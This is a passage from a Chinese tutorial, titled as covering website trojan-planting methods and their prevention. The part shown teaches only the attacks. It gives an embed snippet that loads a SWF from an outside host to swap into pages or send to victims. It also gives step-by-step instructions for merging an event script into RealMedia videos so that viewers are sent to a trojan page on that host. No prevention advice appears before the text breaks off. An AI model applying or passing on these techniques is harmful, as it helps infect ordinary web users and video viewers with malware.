了解常用集中网站挂马和防范方法

核心提示： (4) 在swf中挂马网上有一些swf挂马的工具，可以用工具替换原来网页中的swf或单独把swf发给对方，了解常用集中网站挂马和防范方法(2)，一可以单独作一个可显示swf页的网页，在网页中插入swf的语法一般格式为：<OBJECT classid=clsid:D27CDB6E-AE

(4) 在swf中挂马

网上有一些swf挂马的工具，可以用工具替换原来网页中的swf或单独把swf发给对方，一可以单独作一个可显示swf页的网页。在网页中插入swf的语法一般格式为：

<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=http://www.arthack.org/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>

(5) 在影音文件中挂马。

所需工具是RealMedia Editor，打开工具后，然后依次选择”文件”-”打开Real媒体文件”，然后选择需要编辑的视频文件，其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着，新建一个文本，在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal& http://www.arthack.org/horse.htm (00:00:10.0就是发生第一事件的时间，这里是让计算机弹出网页;00:00:30.0同样，这是第二次发生的时间，在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)

输入完毕后并保存，然后依次选择”工具”-”合并事件”，导入刚才的文本。当合并完成后，依次选择”文本”-”Real文件另存为”，保存好即可。

最后把生成的视频文件发布网上，当对方观看同时就会连接到你指定的木马地址

2、挂马的技巧